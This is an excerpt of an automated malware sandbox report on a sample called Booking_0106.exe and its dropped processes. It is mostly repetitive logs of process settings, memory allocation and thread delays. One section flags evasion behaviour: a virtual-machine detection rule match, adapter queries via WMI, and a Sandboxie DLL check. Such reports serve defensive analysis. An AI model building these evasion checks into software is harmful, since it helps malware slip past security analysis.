Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: Booking_0106.exe PID: 7532, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ibrzb.exe PID: 7880, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ibrzb.exe PID: 7276, type: MEMORYSTR

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\Desktop\Booking_0106.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Booking_0106.exe, 00000000.00000002.1711502008.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000003.00000002.1842814784.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, ibrzb.exe, 00000008.00000002.1926073695.0000000002911000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\Booking_0106.exe	Memory allocated: 1430000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Memory allocated: 2FD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Memory allocated: 4FD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Memory allocated: A10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Memory allocated: 26D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Memory allocated: BE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Memory allocated: 2E40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Memory allocated: 30A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Memory allocated: 2FB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Memory allocated: 2A00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Memory allocated: 2BD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Memory allocated: 4BD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Memory allocated: C50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Memory allocated: 2930000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Memory allocated: 26B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Memory allocated: F90000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Memory allocated: 2910000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Memory allocated: 4910000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Memory allocated: 2E30000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Memory allocated: 2FF0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Memory allocated: 4FF0000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 3000000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2999857	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2999734	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2999600	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2999172	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2999030	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2998906	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2998794	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2998687	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2998578	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2998468	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2998359	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2998241	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2998139	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2998031	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2997921	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2997803	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2997687	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2997576	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2997468	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2997359	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2997250	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2997140	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2997031	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2996922	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2996812	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2996703	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2996593	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2996484	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2996365	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2996246	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2996140	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2996031	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2995921	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2995812	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2995702	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2995590	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2995484	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2995375	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2995265	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2995156	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2995046	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2994937	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2994828	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2994718	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2994604	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2994500	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2994390	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Window / User API: threadDelayed 2655	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Window / User API: threadDelayed 7185	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Window / User API: threadDelayed 2984	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Window / User API: threadDelayed 1196	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Window / User API: threadDelayed 700	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Window / User API: threadDelayed 2687	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Window / User API: threadDelayed 1414
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Window / User API: threadDelayed 2566

Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep time: -29514790517935264s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep time: -3000000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7660	Thread sleep count: 2655 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7660	Thread sleep count: 7185 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep time: -2999857s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep time: -2999734s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep time: -2999600s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep time: -2999172s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep time: -2999030s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep time: -2998906s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep time: -2998794s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep time: -2998687s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep time: -2998578s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep time: -2998468s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep time: -2998359s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep time: -2998241s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep time: -2998139s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep time: -2998031s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep time: -2997921s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep time: -2997803s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep time: -2997687s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep time: -2997576s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep time: -2997468s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep time: -2997359s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep time: -2997250s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep time: -2997140s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep time: -2997031s >= -30000s	Jump to behavior
